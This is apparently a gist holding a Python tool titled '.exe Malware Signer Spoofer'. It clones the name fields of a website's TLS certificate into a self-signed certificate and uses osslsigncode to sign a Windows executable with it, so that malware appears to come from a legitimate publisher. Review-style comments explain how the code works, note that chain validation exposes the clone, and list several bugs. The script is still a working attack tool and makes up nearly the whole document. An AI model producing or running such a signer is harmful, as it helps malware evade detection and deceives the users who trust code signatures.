
@sharpicx
Created August 4, 2024 09:27
.exe Malware Signer Spoofer
import random
import sys
from OpenSSL import crypto
from pathlib import Path
from ssl import get_server_certificate
from subprocess import call, PIPE
from os import system
from random import randrange, randint, uniform, shuffle, SystemRandom
from string import ascii_letters
def spoofer(host, port, filename, out):
    """Clone the name fields of a server's TLS certificate and sign a PE file with the clone.

    The certificate served at ``host:port`` is downloaded, a new RSA key pair
    is generated, and a new certificate is built that copies the original's
    version, serial number, subject, issuer and validity dates but carries
    the new public key and is signed with the new private key. The
    certificate, the key and a PKCS#12 bundle are written under ``certs/``
    (relative to the working directory), and ``osslsigncode`` is run to sign
    ``filename`` into ``out``.

    Review notes:
        * The clone is signed with its own freshly generated key, not with
          the key of the issuer it names. Its signature therefore does not
          verify under the real issuer's public key, it does not chain to a
          trusted root, and its public key and fingerprint differ from the
          genuine certificate. Only checks that compare subject/issuer
          strings are misled; chain validation of the Authenticode
          signature exposes the clone.
        * The private key and the PKCS#12 bundle are written without a
          passphrase.
        * The success message is printed whether or not ``osslsigncode``
          succeeded, because its exit status is never inspected.

    Args:
        host: Host name whose certificate is fetched; also used as the base
            name of the files written under ``certs/``.
        port: Port as a string; converted with ``int()`` for the connection
            and concatenated unchanged into the status message.
        filename: Input path handed to ``osslsigncode -in``.
        out: Output path handed to ``osslsigncode -out``.

    Returns:
        None. Every exception raised inside the body is caught and passed
        to ``bad_certificate``.
    """
    # Despite its name, this value is passed to osslsigncode's -i option below.
    TIMESTAMP_URL = "http://sha256timestamp.ws.symantec.com/sha256/timestamp"
    try:
        # No ca_certs argument is given, so the certificate is retrieved
        # without being validated.
        ogcert = get_server_certificate((host, int(port)))
        x509 = crypto.load_certificate(crypto.FILETYPE_PEM, ogcert)
        certDir = Path('certs')
        certDir.mkdir(exist_ok=True)
        cncrt = certDir / (host + ".crt")
        cnkey = certDir / (host + ".key")
        PFXFILE = certDir / (host + ".pfx")
        # Generate a new key pair: always RSA, sized to the bit length
        # reported for the original certificate's public key.
        k = crypto.PKey()
        k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
        cert = crypto.X509()
        # Copy the descriptive fields from the original certificate.
        cert.set_version(x509.get_version())
        cert.set_serial_number(x509.get_serial_number())
        cert.set_subject(x509.get_subject())
        cert.set_issuer(x509.get_issuer())
        cert.set_notBefore(x509.get_notBefore())
        cert.set_notAfter(x509.get_notAfter())
        # The public key and the signature come from the new key, so the
        # result is not a certificate issued by the authority it names.
        cert.set_pubkey(k)
        cert.sign(k, 'sha256')
        cncrt.write_bytes(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
        # No cipher/passphrase is supplied: the key is stored in clear PEM.
        cnkey.write_bytes(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
        # NOTE(review): both branches make the same call, so the handler
        # adds nothing; presumably it was meant as a fallback for pyOpenSSL
        # builds without crypto.PKCS12 -- confirm.
        try:
            pfx = crypto.PKCS12()
        except AttributeError:
            pfx = crypto.PKCS12()
        pfx.set_privatekey(k)
        pfx.set_certificate(cert)
        # export() is called without a passphrase.
        pfxdata = pfx.export()
        PFXFILE.write_bytes(pfxdata)
        # NOTE(review): in osslsigncode's usage text -n is the description
        # and -i the informational URL, so signed output would carry an
        # 8-12 letter random description and the URL above as its info URL,
        # and no timestamp is requested -- confirm against the installed
        # osslsigncode version.
        args = ("osslsigncode", "sign", "-pkcs12", PFXFILE, "-n", varname_creator(), "-i", TIMESTAMP_URL, "-in", filename, "-out", out)
        # stdout is piped and never read; the return code is discarded.
        call(args, stdout=PIPE)
        certificate = host + ":" + port
        pe_signed(certificate)
    except Exception as ex:
        # Catch-all: network, file-system and missing-binary errors are all
        # reported through the same handler.
        bad_certificate(ex)
def bad_certificate(ex):
    """Print the failure notice followed by the text of *ex*.

    Args:
        ex: The exception (or any object) whose string form is shown on the
            line after the notice.
    """
    notice = f"[!] There is an error in the specified certificate. The executable file has not been signed.\n{ex}\n"
    print(notice)
def varname_creator():
    """Return a string of 8 to 12 random ASCII letters.

    The length comes from the module-level ``randint``; each character is
    drawn with ``SystemRandom().choice``.
    """
    length = randint(8, 12)
    letters = []
    for _ in range(length):
        letters.append(SystemRandom().choice(ascii_letters))
    return ''.join(letters)
def pe_signed(certificate):
    """Print the completion message naming the certificate source.

    Args:
        certificate: Text identifying the source, interpolated verbatim
            into the message.
    """
    message = f"[+] PE file signed with spoofed certificate from {certificate}"
    print(message)
if __name__ == "__main__":
    # Command-line entry: <host> <port> <filename> <output>.
    argv = sys.argv
    # NOTE(review): the guard accepts three arguments although four are read
    # below, so omitting <output> raises IndexError instead of showing usage.
    if len(argv) < 4:
        print(f"[!] usage: {argv[0]} <host> <port> <filename> <output>")
        exit(1)
    host, port = argv[1], argv[2]
    spoofer(host, port, argv[3], argv[4])